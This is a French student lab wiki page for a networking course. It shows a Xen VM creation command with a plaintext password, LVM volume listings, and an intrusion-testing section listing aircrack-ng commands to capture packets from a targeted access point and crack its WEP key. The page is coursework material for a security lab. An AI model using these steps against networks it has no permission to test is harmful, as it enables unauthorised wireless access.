TP sysres IMA5sc 2020/2021 G9

De Wiki d'activités IMA

Création de la VM : root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.23 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5

 --- Logical volume ---
 LV Path                /dev/storage/PaulTanguy1
 LV Name                PaulTanguy1
 VG Name                storage
 LV UUID                Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD
 LV Write Access        read/write
 LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               1
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:24
  
 --- Logical volume ---
 LV Path                /dev/storage/PaulTanguy2
 LV Name                PaulTanguy2
 VG Name                storage
 LV UUID                zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt
 LV Write Access        read/write
 LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               1
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:25


___________________________


Tests d'intrusion

Cassage de clef WEP d’un point d’accès WiFi

liste des commandes :

- airmon-ng : affiche les interfaces réseau

- airmon-ng start <interface>: passe l'interface en mode monitor

- airodump-ng --encrypt wep 'nomInterface' : affiche les réseaux wifi WEP

- airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface' : capture les paquets émis par le point d'accés ciblé

- aircrack-ng -x 'nomFichier'-01.cap : crack la clef WEP (à condition d'avoir capturé assez de paquets)